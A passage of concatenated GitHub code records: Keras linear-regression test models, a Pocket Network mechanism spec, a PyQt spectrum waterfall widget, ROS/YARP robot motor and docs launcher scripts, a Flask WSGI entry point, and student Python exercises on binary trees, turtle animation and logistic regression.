layer that can be used in isolation for linear regression.\n\n Constructs a Keras dense layer with a single output, using biases and 
weights\n that are initialized to zero. No activation function is applied. When this is\n the only layer in a model, the model is effectively a linear regression model.\n\n Args:\n input_dims: the integer length of the input to this layers. Maybe None if\n the layer input size does not need to be specified.\n output_dim: the integer length of the flattened output tensor. Defaults to\n one, effectively making the layer perform linear regression.\n\n Returns:\n a `tf.keras.layers.Dense` object.\n \"\"\"\n build_keras_dense_layer = functools.partial(\n tf.keras.layers.Dense,\n units=output_dim,\n use_bias=True,\n kernel_initializer='zeros',\n bias_initializer='zeros',\n activation=None)\n if input_dims is not None:\n return build_keras_dense_layer(input_shape=(input_dims,))\n return build_keras_dense_layer()\n\n\ndef build_linear_regresion_keras_sequential_model(feature_dims=2):\n \"\"\"Build a linear regression `tf.keras.Model` using the Sequential API.\"\"\"\n keras_model = tf.keras.models.Sequential()\n keras_model.add(_dense_all_zeros_layer(feature_dims))\n return keras_model\n\n\ndef build_linear_regresion_keras_functional_model(feature_dims=2):\n \"\"\"Build a linear regression `tf.keras.Model` using the functional API.\"\"\"\n a = tf.keras.layers.Input(shape=(feature_dims,))\n b = _dense_all_zeros_layer()(a)\n return tf.keras.Model(inputs=a, outputs=b)\n\n\ndef build_linear_regresion_keras_subclass_model(feature_dims=2):\n \"\"\"Build a linear regression model by sub-classing `tf.keras.Model`.\"\"\"\n del feature_dims # unused.\n\n class _KerasLinearRegression(tf.keras.Model):\n\n def __init__(self):\n super(_KerasLinearRegression, self).__init__()\n self._weights = _dense_all_zeros_layer()\n\n def call(self, inputs, training=True):\n return self._weights(inputs)\n\n return _KerasLinearRegression()\n\n\ndef build_embedding_keras_model(vocab_size=10):\n \"\"\"Builds a test model with an embedding initialized to one-hot vectors.\"\"\"\n keras_model = tf.keras.models.Sequential()\n keras_model.add(tf.keras.layers.Embedding(input_dim=vocab_size, output_dim=5))\n keras_model.add(tf.keras.layers.Softmax())\n return keras_model\n\n\ndef build_conv_batch_norm_keras_model():\n \"\"\"Builds a test model with convolution and batch normalization.\"\"\"\n # This is an example of a model that has trainable and non-trainable\n # variables.\n l = tf.keras.layers\n data_format = 'channels_last'\n max_pool = l.MaxPooling2D((2, 2), (2, 2),\n padding='same',\n data_format=data_format)\n keras_model = tf.keras.models.Sequential([\n l.Reshape(target_shape=[28, 28, 1], input_shape=(28 * 28,)),\n l.Conv2D(\n 32,\n 5,\n padding='same',\n data_format=data_format,\n activation=tf.nn.relu,\n kernel_initializer='zeros',\n bias_initializer='zeros'),\n max_pool,\n l.BatchNormalization(),\n l.Conv2D(\n 64,\n 5,\n padding='same',\n data_format=data_format,\n activation=tf.nn.relu,\n kernel_initializer='zeros',\n bias_initializer='zeros'),\n max_pool,\n l.BatchNormalization(),\n l.Flatten(),\n l.Dense(\n 1024,\n activation=tf.nn.relu,\n kernel_initializer='zeros',\n bias_initializer='zeros'),\n l.Dropout(0.4),\n l.Dense(10, kernel_initializer='zeros', bias_initializer='zeros'),\n ])\n return keras_model\n","repo_name":"abogdanova/FedMed","sub_path":"federated-0.4.0/tensorflow_federated/python/learning/model_examples.py","file_name":"model_examples.py","file_ext":"py","file_size_in_byte":8450,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} 
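The model_examples.py record above wires its forward pass so that total_loss = 0.5 * sum(residuals ** 2) and the reported loss is that total divided by the batch size. A minimal NumPy sketch of the same arithmetic (illustrative only, not part of any record; the sample batch is made up):

import numpy as np

# Batch of 2 examples with feature_dim=2; weights start at zero,
# matching the zero-initialized model above.
x = np.array([[1.0, 2.0], [3.0, 4.0]])
y = np.array([[5.0], [11.0]])
a = np.zeros((2, 1))
b = c = 0.0

predictions = x @ a + b + c
residuals = predictions - y
total_loss = 0.5 * np.sum(residuals ** 2)   # 0.5 * (25 + 121) = 73.0
average_loss = total_loss / len(x)          # 36.5
print(average_loss)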
+{"seq_id":"24984293303","text":"from ..Spaces import (modify_servicer_pokt_space, servicer_param_update_space, servicer_unpause_space2,\n servicer_pause_space2, servicer_stake_status_space, servicer_relay_space,\n remove_servicer_space)\n\n\nmodify_servicer_pokt_holdings = {\"name\": \"Modify Servicer POKT Holdings\",\n \"description\": \"The mechanism to update the personal holdings of a servicer\",\n \"constraints\": [],\n \"logic\": \"The servicer at DOMAIN[0].servicer_address has its POKT Holdings modified by DOMAIN[0].value\",\n \"domain\": [modify_servicer_pokt_space],\n \"parameters_used\": []}\n\nmodify_servicer_stake = {\"name\": \"Modify Servicer Stake\",\n \"description\": \"The mechanism to update the stake of a servicer\",\n \"constraints\": [],\n \"logic\": \"The servicer at DOMAIN[0].servicer_address has its stake modified by DOMAIN[0].value\",\n \"domain\": [modify_servicer_pokt_space],\n \"parameters_used\": []}\n\nprune_servicer_qos = {\"name\": \"Prune Servicer QoS\",\n \"description\": \"The mechanism which prunes historical QoS (TestScores, ReportCard, etc…)\",\n \"constraints\": [],\n \"logic\": \"The servicer at DOMAIN[0].public_key has its QoS metrics pruned\",\n \"domain\": [servicer_param_update_space],\n \"parameters_used\": []}\n\nupdate_servicer_params = {\"name\": \"Update Servicer Params\",\n \"description\": \"The mechanism which updates servicer params\",\n \"constraints\": [],\n \"logic\": \"The servicer at DOMAIN[0].public_key has its params updated with the latest stake, assuming the stake was greater than the prior stake\",\n \"domain\": [servicer_param_update_space],\n \"parameters_used\": []}\n\nservicer_unpause_mechanism = {\"name\": \"Servicer Unpause Mechanism\",\n \"description\": \"The mechanism which unpauses a servicer\",\n \"constraints\": [],\n \"logic\": \"The servicer at DOMAIN[0].address has its pause_height variable updated to None\",\n \"domain\": [servicer_unpause_space2],\n \"parameters_used\": []}\n\nservicer_update_pause_height = {\"name\": \"Servicer Update Pause Height\",\n \"description\": \"The mechanism which updates the pause height \",\n \"constraints\": [],\n \"logic\": \"The servicer at DOMAIN[0].address has its pause_height variable updated to DOMAIN[0].height\",\n \"domain\": [servicer_pause_space2],\n \"parameters_used\": []}\n\nupdate_servicer_stake_status = {\"name\": \"Update Servicer Stake Status\",\n \"description\": \"The mechanism which updates the staking status and as well the unstaking height.\",\n \"constraints\": [],\n \"logic\": \"The servicer at DOMAIN[0].address has its unstaking_height variable updated to DOMAIN[0].height which will be none if it is staking. 
It will also have its stake status set to DOMAIN[0].status.\",\n \"domain\": [servicer_stake_status_space],\n \"parameters_used\": []}\n\nremove_session = {\"name\": \"Remove Session\",\n \"description\": \"The mechanism which removes a session from the global state.\",\n \"constraints\": [],\n \"logic\": \"The session from DOMAIN[0] is removed from the global session state.\",\n \"domain\": [servicer_relay_space],\n \"parameters_used\": []}\n\nremove_servicer = {\"name\": \"Remove Servicer\",\n \"description\": \"The mechanism which removes a servicer from the global state.\",\n \"constraints\": [],\n \"logic\": \"The servicer from DOMAIN[0] is removed from the global session state.\",\n \"domain\": [remove_servicer_space],\n \"parameters_used\": []}\n","repo_name":"BlockScience/PocketMathSpec","sub_path":"src/Mechanisms/Servicer.py","file_name":"Servicer.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"31606322792","text":"import re\nimport sys\nimport os\nimport time\nimport struct\nimport signal\nimport numpy as np\nimport random\n\nfrom PyQt5 import Qt\nfrom PyQt5 import QtCore,QtGui\nfrom PyQt5.QtGui import QColor,QImage,QPainter\nfrom PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtCore import QRect,QEvent\n\nclass WaterfallWidget(QWidget):\n def __init__(self,main,config,parent_widget):\n QWidget.__init__(self)\n self.main = main\n self.config = config\n self.parent_widget = parent_widget \n parent_widget.addWidget(self)\n self.installEventFilter(self)\n self.setMouseTracking(True)\n self.dw = 0\n self.dh = 0\n self.line = 0\n self.bias = self.main.config['waterfall_bias']\n self.drawing = False\n self.setup1()\n self.setup2()\n \n def eventFilter(self, object, evt):\n if evt.type() == QEvent.Wheel:\n self.bias += (-4,4)[evt.angleDelta().y() > 0]\n return False\n \n def setup1(self):\n self.colors = []\n for n in range(256):\n h = self.ntrp(n,0,256,240,60)\n cn = self.ntrp(n,0,256,80,255)\n self.colors.append(QColor.fromHsv(h,255.0,cn))\n \n def setup2(self):\n dw = self.dw\n dh = self.dh\n self.acquire_essential()\n if dw != self.dw or dh != self.dh:\n self.image = QImage(self.dw,self.dh,QImage.Format_RGB32)\n p = QPainter(self.image)\n p.fillRect(0, 0, self.width(), self.height(),QtGui.QColor(0,0,0))\n \n def acquire_essential(self):\n self.dh = self.height()\n self.dw = self.width()\n \n def ntrp(self,x,xa,xb,ya,yb):\n return (x-xa)*(yb-ya)/(xb-xa) + ya\n \n def accept_data_line(self,array):\n if not self.drawing and self.isVisible():\n self.line = (self.line - 1) % self.dh\n self.drawing = True\n qp = QPainter(self.image)\n \n la = len(array)\n ox = None\n for x,y in enumerate(array):\n x = self.ntrp(x,0,la,0,self.dw)\n y = int(self.ntrp(y*4+self.bias,self.config['dbscale_lo'],self.config['dbscale_hi'],0,255))\n y = (y,0)[y < 0]\n y = (y,255)[y > 255]\n if ox != None:\n qp.setPen(self.colors[y])\n qp.drawLine(ox,self.line,x,self.line)\n ox = x\n self.update()\n \n def paintEvent(self,event):\n if self.isVisible():\n self.drawing = True\n self.setup2()\n qp = QtGui.QPainter(self)\n ha = self.line\n hb = self.dh - ha\n \n fa = QRect(0,ha,self.dw,hb)\n fb = QRect(0,0,self.dw,ha)\n \n ta = QRect(0,0,self.dw,hb)\n tb = QRect(0,hb,self.dw,ha)\n \n qp.drawImage(ta,self.image,fa)\n qp.drawImage(tb,self.image,fb)\n self.drawing = False\n \n 
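The Waterfall.py chunk above leans on ntrp, a one-line linear remap that projects a value from one range onto another; accept_data_line uses it to map dB levels onto a 0-255 palette index and then clamps. A standalone sketch of the idiom (the -120..0 dB bounds are made-up stand-ins for the dbscale_lo/dbscale_hi config values, which this excerpt does not show):

def ntrp(x, xa, xb, ya, yb):
    # Linearly remap x from the range [xa, xb] to [ya, yb].
    return (x - xa) * (yb - ya) / (xb - xa) + ya

level_db = -30.0
y = int(ntrp(level_db, -120.0, 0.0, 0, 255))
y = max(0, min(255, y))   # clamp, as accept_data_line does
print(y)                  # 191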
","repo_name":"lutusp/PLSDR","sub_path":"Waterfall.py","file_name":"Waterfall.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":153,"dataset":"github-code","pt":"40"} +{"seq_id":"34427710373","text":"#!/usr/bin/env python\nimport sys\nimport os\n\n# Locate MOOSE directory\nos.chdir(os.path.abspath(os.path.dirname(__file__)))\nMOOSE_DIR = os.getenv('MOOSE_DIR', os.path.join(os.getcwd(), '..', 'moose'))\nif not os.path.exists(os.path.join(MOOSE_DIR, 'libmesh')):\n MOOSE_DIR = os.path.join(os.getcwd(), '..', '..', 'moose')\nif not os.path.exists(MOOSE_DIR):\n raise Exception('Failed to locate MOOSE, specify the MOOSE_DIR environment variable.')\nos.environ['MOOSE_DIR'] = MOOSE_DIR\n\n# Append MOOSE python directory\nMOOSE_PYTHON_DIR = os.path.join(MOOSE_DIR, 'python')\nif MOOSE_PYTHON_DIR not in sys.path:\n sys.path.append(MOOSE_PYTHON_DIR)\n\nos.environ['BLACKBEAR_DIR'] = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\n\nfrom MooseDocs import main\nif __name__ == '__main__':\n sys.exit(main.run())\n","repo_name":"idaholab/blackbear","sub_path":"doc/moosedocs.py","file_name":"moosedocs.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"40"} +{"seq_id":"37471636365","text":"#!/usr/bin/env python\nimport numpy as np\nimport rospy\nfrom icub_drivers.msg import Commands, JointPositions\nfrom std_msgs.msg import Empty\nimport yarp\nimport sys\nimport data_keys\nimport time\n#import signal\n\nimport os\nos.environ[\"ROS_MASTER_URI\"] = \"http://localhost:11311\"\nos.environ[\"ROS_HOSTNAME\"] = \"localhost\"\n\n\nclass MotorDriver:\n\n\tdef __init__(self):\n\t\tself.robot_ip = \"localhost\" #\"192.168.26.135\"\n\n\t\t# Initialise YARP\n\t\tyarp.Network.init()\n\t\trospy.loginfo(\"motor_driver connected to yarp\")\n\n\t\t# create ros node\n\t\trospy.init_node('icub_motors_driver', anonymous=True)\n\n\t\t# create the subscribers\n\t\ttarget_pos_sub = rospy.Subscriber('/icubRos/commands/move_to_joint_pos', JointPositions, self.move_to_joint_pos_callback, queue_size=10)\n\n\t\tself.props = []\n\t\tself.joint_drivers = [] \n\t\t# encoders for each joint group,e.g. 
head, left_arm, etc.\n\t\tself.pos_control = []\n\t\t# number of joints in each joint group\n\t\tself.num_joint = [] \n\t\tfor j in range(len(data_keys.JointNames)):\t\n\t\t\tself.props.append(yarp.Property())\n\t\t\tself.props[-1].put(\"device\", \"remote_controlboard\")\n\t\t\tself.props[-1].put(\"local\", \"/client_motor/\"+data_keys.JointNames[j])\n\t\t\tself.props[-1].put(\"remote\", \"/icubSim/\"+data_keys.JointNames[j])\n\n\t\t\tself.joint_drivers.append(yarp.PolyDriver(self.props[-1]))\n\t\t\tself.pos_control.append(self.joint_drivers[-1].viewIPositionControl())\n\n\t\trospy.spin()\n\n\n\tdef get_num_joints(self, group_id):\n\t\treturn self.joint_drivers[group_id].viewIPositionControl().getAxes()\n\n\tdef move_to_joint_pos_callback(self, msg, verbose=True):\n\t\tself.cmd_msg = msg\n\n\t\tif verbose:\n\t\t\tstart_time = time.time()\n\n\t\tfor jn in range(len(data_keys.JointNames)):\n\t\t\tcmd = data_keys.get_joint_values_from_msg(self.cmd_msg, data_keys.JointNames[jn])\n\t\t\t\n\t\t\tif verbose:\n\t\t\t\tprint (\"sending cmd \", str(cmd))\n\t\t\tcmd_yarp = yarp.Vector(self.get_num_joints(jn))\n\t\t\tfor j in range(self.get_num_joints(jn)):\n\t\t\t\tcmd_yarp.set(j, cmd[j])\n\t\t\t# send command\n\t\t\tself.pos_control[jn].setControlMode(yarp.Vocab_encode('pos'))\n\t\t\tself.pos_control[jn].positionMove(cmd_yarp.data())\n\n\t\tif verbose:\n\t\t\tend_time = time.time()\n\t\t\telapsed = end_time - start_time\n\t\t\tprint (\"sending command took (seconds): \", elapsed)\n\n\n\nif __name__==\"__main__\":\n\trospy.loginfo(\"motor_driver started\")\n\ttry:\n\t\tmotorDriver = MotorDriver()\n\t\t\n\texcept rospy.ROSInterruptException:\n\t\tpass\n\n","repo_name":"guidoschillaci/icub_sensory_enhancement_","sub_path":"ros_ws/src/icub_drivers/src/icub_motors_driver.py","file_name":"icub_motors_driver.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6826981446","text":"\"\"\"Web Server Gateway Interface entry-point.\"\"\"\n\nimport os\nfrom typing import Optional\n\nfrom flask import Flask\n\nfrom preview.factory import create_app\n\n__flask_app__: Optional[Flask] = None\n\n\ndef application(environ, start_response):\n \"\"\"WSGI application factory.\"\"\"\n global __flask_app__\n for key, value in environ.items():\n if type(value) is str and key != 'SERVER_NAME':\n os.environ[key] = value\n if __flask_app__ is not None and key in __flask_app__.config:\n __flask_app__.config[key] = value\n if __flask_app__ is None:\n __flask_app__ = create_app()\n return __flask_app__(environ, start_response)\n","repo_name":"arXiv/arxiv-submission-preview","sub_path":"wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"4534133046","text":"\n####################\n# Helper functions #\n# - print_tree #\n# - accumulate #\n####################\n\ndef print_tree(tree, print_output=True):\n \"\"\"\n Helper function to print trees in this mission.\n\n Yes, it looks scary. 
Nothing to see here (:\n \"\"\"\n def get_elements_at_level(tree, level):\n def helper(tree, level, cur):\n if is_empty_tree(tree) and cur < level:\n dummy = build_tree(\" \", make_empty_tree(), make_empty_tree())\n return helper(left_branch(dummy), level, cur + 1) + helper(right_branch(dummy), level, cur + 1)\n if cur == level:\n if is_empty_tree(tree):\n return (\" \", )\n else:\n return (entry(tree), )\n elif cur < level:\n return helper(left_branch(tree), level, cur + 1) + helper(right_branch(tree), level, cur + 1)\n return helper(tree, level, 0)\n\n def height(tree):\n if is_empty_tree(tree):\n return 0\n else:\n return 1 + max(height(left_branch(tree)), height(right_branch(tree)))\n\n h = height(tree)\n output_string = \"\"\n\n for level in range(h):\n indent = 2 ** (h - (level + 1)) - 1\n spacing = 2 ** (h - level) - 1\n\n output = \" \" * indent\n\n for i, e in enumerate(get_elements_at_level(tree, level)):\n if level == 0 or i == 0:\n output = output + str(e)\n else:\n output = output + \" \" * spacing + str(e)\n if print_output:\n print(output)\n else:\n output_string += output + '/'\n if not print_output:\n return output_string\n\ndef accumulate(fn, initial, seq):\n if not seq: # if seq is empty\n return initial\n else:\n return fn(seq[0], accumulate(fn, initial, seq[1:]))\n\n\n###########\n# # 1a #\n###########\n\ndef build_tree(entry, left, right):\n \n return [entry, left, right]\n\n\n###########\n# # 1b #\n###########\n\ndef entry(tree):\n #\n return tree[0]\n\ndef left_branch(tree):\n #\n return tree[1]\n\ndef right_branch(tree):\n #\n return tree[2]\n\n\n###########\n# # 1c #\n###########\n\ndef make_empty_tree():\n #\n return []\n\n\n###########\n# # 1d #\n###########\n\ndef is_empty_tree(tree):\n #\n return True if tree==None or len(tree)==0 else False\n\nt1 = build_tree(2, build_tree(1, make_empty_tree(),\n make_empty_tree()),\n build_tree(3, make_empty_tree(),\n make_empty_tree()))\nprint_tree(t1)\n#=> 2\n#=>1 3\n\nt2 = build_tree(5, build_tree(2, build_tree(1, make_empty_tree(),\n make_empty_tree()),\n make_empty_tree()),\n build_tree(7, make_empty_tree(),\n build_tree(10, make_empty_tree(),\n make_empty_tree())))\nprint_tree(t2)\n#=> 5\n#=> 2 7\n#=>1 10\n\n\n###########\n# # 2a #\n###########\n\ndef insert_tree(x, tree):\n \"\"\"\n - tree is empty -> return a tree with x as entry and empty left and right branches\n - x <= entry -> return new tree with x inserted into left sub tree\n - otherwise -> return new tree with x inserted into right sub tree\n \"\"\"\n if is_empty_tree(tree):\n return build_tree(x, make_empty_tree(),make_empty_tree())\n elif x>entry(tree):\n return build_tree(entry(tree), left_branch(tree),insert_tree(x,right_branch(tree)))\n else:\n return build_tree(entry(tree), insert_tree(x,left_branch(tree)), right_branch(tree),)\n \n\nt1 = insert_tree(5, t1)\nprint_tree(t1)\n#=> 2 insert_tree(5, t1) 2\n#=>1 3 ===> 1 3\n#=> 5\n\nt2 = insert_tree(6, t2)\nprint_tree(t2)\n#=> 5 insert_tree(6, t2) 5\n#=> 2 7 ===> 2 7\n#=>1 10 1 6 10\n\nt2 = insert_tree(3, t2)\nprint_tree(t2)\n#=> 5 insert_tree(3, t2) 5\n#=> 2 7 ===> 2 7\n#=>1 6 10 1 3 6 10\n\n\n###########\n# # 2b #\n###########\n\n# Time complexity of insert_tree: O(logn)\n\n\n###########\n# # 2c #\n###########\n\ndef contains(x, tree):\n \"\"\" Returns true if x is in binary tree, otherwise return false \"\"\"\n #\n if is_empty_tree(tree):\n return False\n elif entry(tree)==x:\n return True\n elif x < entry(tree):\n return contains(x, left_branch(tree))\n else:\n return contains(x, right_branch(tree))\n\nprint(contains(5, t1))\n#=> True\n\nprint(contains(42, t1))\n#=> False\n\nprint(contains(10, 
t2))\n#=> True\n\nprint(contains(6, t2))\n#=> True\n\nprint(contains(11, t2))\n#=> False\n\n\n###########\n# # 2d #\n###########\n\n# Time complexity of contains O(logn):\n\n\n###########\n# # 2e #\n###########\nprint(t1)\ndef flatten(tree):\n \"\"\" flattens tree with the following rule:\n visit left branch, visit entry then visit right branch \"\"\"\n if is_empty_tree(tree):\n return []\n else:\n return flatten(left_branch(tree))+[entry(tree),]+flatten(right_branch(tree))\n\nprint(flatten(t1),'here')\n#=> [1, 2, 3, 5]\n\nprint(flatten(t2))\n#=> [1, 2, 3, 5, 6, 7, 10]\n\n\n###########\n# # 2f #\n###########\n\n# Time complexity of flatten O(n^2):\n\n\n###########\n# # 3a #\n###########\n\ndef sort_it(lst):\n Btree=accumulate(insert_tree, [], lst)\n return flatten(Btree)\n\nprint(sort_it([5, 3, 2, 1, 4, 6, 7, 9]))\n#=> [1, 2, 3, 4, 5, 6, 7, 9]\n\nprint(sort_it([5, 3, 2, 1, 4, -1, 6, 0, 7, 9]))\n#=> [-1, 0, 1, 2, 3, 4, 5, 6, 7, 9]\n\n\n###########\n# # 3b #\n###########\n\n# Time complexity of sort_it O(+n^2*logn):\n","repo_name":"jasonjiang8866/algorithm_design","sub_path":"binary treee inserting searching and sorting .py","file_name":"binary treee inserting searching and sorting .py","file_ext":"py","file_size_in_byte":5701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"32205323922","text":"## Name: Ian Johnson\n## Date Last Modified: 9.16.16\n## Program: Turtle Animation\n## Purpose: Simple animation of a ball falling and bouncing\n## Honesty Statement: I neither gave nor recieved unauthorized help on this code.\n##\n## END GOAL: Animate the Pixar ball falling, then bouncing across the screen.\n\nfrom turtle import *\n\n# Define colors\npurple = (1,0,1)\nred = (1,0,0)\ngreen = (0,1,0)\nblue = (0,0,1)\nyellow = (1,1,0)\nazure = (0,1,1)\nblack = (0,0,0)\nwhite = (1,1,1)\n\n# Define a few variables for future reference\nradius = 25 ## Radius of ball\nx = -275 ## Inital 'x' position\ny = 100 ## Inital 'y' position\nroll = 0\narc = 0\n\ntracer(0) ## Draw instantly\nhideturtle() ## Do not show the pen\n\ndef ballArc(h, k, a): ## (h, k) specifies vertex; 'a' is shape of parabola\n global x, y, roll, arc\n while(True):\n if y >= -280: ## Animation of ball\n clear() ## Clear previous drawings (after first iteration)\n \n # Draw 'floor'\n penup()\n pensize(3)\n setposition(-400,-275)\n setheading(0)\n pencolor(black)\n pendown()\n forward(750)\n \n # Draw circle\n penup()\n fillcolor(yellow)\n pencolor(blue)\n pensize(4)\n setposition(x,y) ## Set new Turtle position\n pendown()\n begin_fill() ## Define shape that will be filled\n circle(radius) ## Draw a circle with the user-defined radius\n end_fill() ## End defining shapes that will be filled\n \n # Draw a star\n penup() ## Allows pen to be positioned\n setposition(x, y + 6) ## Set start postion to center star\n circle(radius - radius/4, -arc) # Draw an arc\n pendown() ## Prepare pen for drawing \n setheading(heading()+112) ## Set direction of turtle\n fillcolor(red) ## Set fill color\n begin_fill() ## Begin defining shape to fill with color\n for i in range(0,5): ## Draws star\n pensize(1)\n pencolor(red)\n forward(12) \n left(72) \n forward(12) \n right(144)\n end_fill() ## End defining shape to fill\n \n update() ## Update drawings\n \n prevX = x\n prevY = y\n x += .25 ## Change x and y values so next rendering is moved\n y = a * (x-h)**2 + k ## Creates a parabolic shape for the ball\n roll -= 1\n arc += 2\n \n else:\n currentX = x\n currentY = y\n #print('Current Y:',y)\n x = 
prevX\n y = prevY\n break\n \n# All the magic happens here\nballArc(-275,100,-.5) ## First bounce\nprint('1')\nballArc(-225,50,-.5) ## Second bounce\nprint('2')\nballArc(-175, 25, -.5) ## Third bounce\nprint('3')\nballArc(-130, 25, -.5) ## Fourth bounce\nprint('4')\nballArc(-80, 0, -.25) ## Fifth bounce\nprint('5')\nballArc(-20, -25, -.25) ## Sixth bounce\nprint('6')\nballArc(30, -50, -.25) ## Seventh bounce\nprint('7')\nballArc(80, -75, -.25) ## Eighth bounce\nprint('8')\nballArc(120, -100, -.25) ## Ninth bounce\nprint('9')\nballArc(150, -125, -.25) ## Tenth bounce\nprint('10')\nballArc(170, -150, -.25) ## Eleventh bounce\nprint('11')\nballArc(180, -175, -.25) ## Twelfth bounce\nprint('12')\nballArc(125, -200, -.25) ## Thirteenth bounce\nprint('13')\nballArc(150, -225, -.25) ## Fourteenth bounce\nprint('14')\nballArc(175, -250, -.25) ## Fifteenth bounce\nprint('15')\n\n# Make the ball roll off screen\nwhile(x <= 350): ## While ball is on screen\n clear() ## Clear previous drawings (after first iteration)\n \n # Draw 'floor'\n penup()\n pensize(3)\n setposition(-400,-275)\n setheading(0)\n pencolor(black)\n pendown()\n forward(750)\n \n # Draw circle\n penup()\n fillcolor(yellow)\n pencolor(blue)\n pensize(4)\n setposition(x,y) ## Set new Turtle position\n pendown()\n begin_fill() ## Define shape that will be filled\n circle(radius) ## Draw a circle with the user-defined radius\n end_fill() ## End defining shapes that will be filled\n \n # Draw a star\n penup() ## Allows pen to be positioned\n setposition(x, y + 6) ## Set start postion to center star\n circle(radius - radius/4, -arc) ## Draw an arc\n pendown() ## Prepare pen for drawing \n setheading(heading()+112) ## Set direction of turtle\n fillcolor(red) ## Set fill color\n begin_fill() ## Begin defining shape to fill with color\n for i in range(0,5): ## Draws star\n pensize(1)\n pencolor(red)\n forward(12) \n left(72) \n forward(12) \n right(144)\n end_fill() ## End defining shape to fill\n \n update() ## Update drawings\n \n x += 1 ## Change x and y values so next rendering is moved\n arc += 2 ## Change arc length\n\ndone()","repo_name":"unspezifische/CPTR-124-Turtle-Graphics","sub_path":"animation2.py","file_name":"animation2.py","file_ext":"py","file_size_in_byte":5672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20050989168","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport scipy.optimize as opt\n\n# 展示前五行数据\npath = \"ex2data1.txt\"\ndata = pd.read_csv(path, header=None, names=['exam1', 'exam2', 'admitted'])\n# print(data.head())\n\n# # 绘制原始数据\npositive = data[data['admitted'].isin([1])] # 筛选admitted列中是1的数据出来\nnegative = data[data['admitted'].isin([0])]\n\n# fig, ax = plt.subplots(figsize=(8, 5)) # 设置出来的画布大小为8*5\n# # 绘制散点图。x轴为exam1,y轴为label2,颜色是绿色,标记是o(圆形),绘制的标签是admitted\n# ax.scatter(positive[\"exam1\"], positive[\"exam2\"],\n# c='green', marker='o', label=\"admitted\")\n# # 绘制散点图。x轴为exam1,y轴为label2,颜色是红色,标记是x(x形),绘制的标签是not admitted\n# ax.scatter(negative[\"exam1\"], negative[\"exam2\"],\n# c='red', marker='x', label=\"not admitted\")\n# ax.legend() # 绘制标签将其显示出来\n# # plt.show()\n\n# 实现\n\n# S型函数(Sigmoid)\n\n\ndef S(z):\n return 1/(1+np.exp(-z))\n\n# 代价函数\n\n\ndef cost(theta, x, y):\n theta = np.matrix(theta)\n x = np.matrix(x)\n y = np.matrix(y)\n first = np.multiply(-y, np.log(S(x*theta.T)))\n second = np.multiply((1-y), np.log(1-S(x*theta.T)))\n return np.sum(first-second)/len(x)\n\n\n# 初始化操作\ndata.insert(0, \"Ones\", 1) # 
在data中的第0列插入表头为ONEs数据为1的一列数据\ncols = data.shape[1] # 返回data矩阵的形式,0代表行,1代表列\nx = data.iloc[:, 0:cols-1] # 基于位置的索引\ny = data.iloc[:, cols-1:cols]\ntheta = np.zeros(3)\n\n# x.values文档中推荐使用x.to_numpy()代替同样可以返回numpy.ndarray数据\nx = np.array(x.to_numpy())\ny = np.array(y.to_numpy())\n\n# 梯度下降\n\n\ndef gradient(theta, x, y):\n theta = np.matrix(theta)\n x = np.matrix(x)\n y = np.matrix(y)\n\n parameters = int(theta.ravel().shape[1]) # ravel()是将其矩阵化为1维矩阵\n grad = np.zeros(parameters)\n\n error = S(x*theta.T)-y\n for i in range(parameters):\n term = np.multiply(error, x[:, i])\n grad[i] = np.sum(term)/len(x)\n\n return grad\n\n\n# 使用工具库计算θ的值\n\n# result = opt.fmin_tnc(func=cost, x0=theta, fprime=gradient, args=(x, y))\n# 截断牛顿法的传参列表:\n# func:优化的目标函数\n# x0:初值\n# fprime:提供优化函数func的梯度函数,不然优化函数func必须返回函数值和梯度,或者设置approx_grad=True\n# approx_grad :如果设置为True,会给出近似梯度\n# args:元组,是传递给优化函数的参数\n\n# 返回值是第一个为数组,返回的优化问题目标值相当于返回θ。第二个整数,优化函数运行次数\n\n# 画出决策曲线\n# plotting_x1 = np.linspace(30, 100, 100) # 30-100中平均划分100个数字\n# plotting_h1 = (-result[0][0]-result[0][1]*plotting_x1)/result[0][2]\n\n# fig, ax = plt.subplots(figsize=(8, 5))\n# ax.plot(plotting_x1, plotting_h1, color='black', label='prediction')\n# ax.scatter(positive[\"exam1\"], positive[\"exam2\"],\n# c='green', marker='o', label=\"admitted\")\n# ax.scatter(negative[\"exam1\"], negative[\"exam2\"],\n# c='red', marker='x', label=\"not admitted\")\n# ax.legend()\n# ax.set_xlabel(\"exam1 score\")\n# ax.set_ylabel(\"exam2 score\")\n# plt.show()\n\n# 评价逻辑回归模型\n# 手动模拟一个数据\n\n\ndef hfunc(theta, x):\n return S(theta.T@x) # 疑问:输入[1,0,0]得到的录取率180%多是否做边界检查?\n\n\ndef predict(theta, x):\n predictions = []\n probability = S(x@theta.T)\n for x in probability:\n if x >= 0.5:\n predictions.append(1)\n else:\n predictions.append(0)\n return predictions\n\n\n# 使用训练集评测模型的准确率\n# theta_min = np.matrix(result[0])\n# predictions = predict(theta_min, x)\n# corrent = []\n# print(type(predictions), type(y))\n# for (a, b) in zip(predictions, y):\n# if (a == 1 and b == 1) or (a == 0 and b == 0):\n# corrent.append(1)\n# else:\n# corrent.append(0)\n# accuracy = (sum(corrent))/len(corrent)\n# print(\"accuracy is {0}%\".format(accuracy*100))\n\n# 正则化逻辑回归\n\n# 数据可视化\npath = \"ex2data2.txt\"\ndata2_init = pd.read_csv(path, header=None, names=[\n \"test1\", \"test2\", \"accepted\"])\npositive2 = data2_init[data2_init[\"accepted\"].isin([1])]\nnegative2 = data2_init[data2_init[\"accepted\"].isin([0])]\n# fig, ax = plt.subplots(figsize=(8, 5))\n# 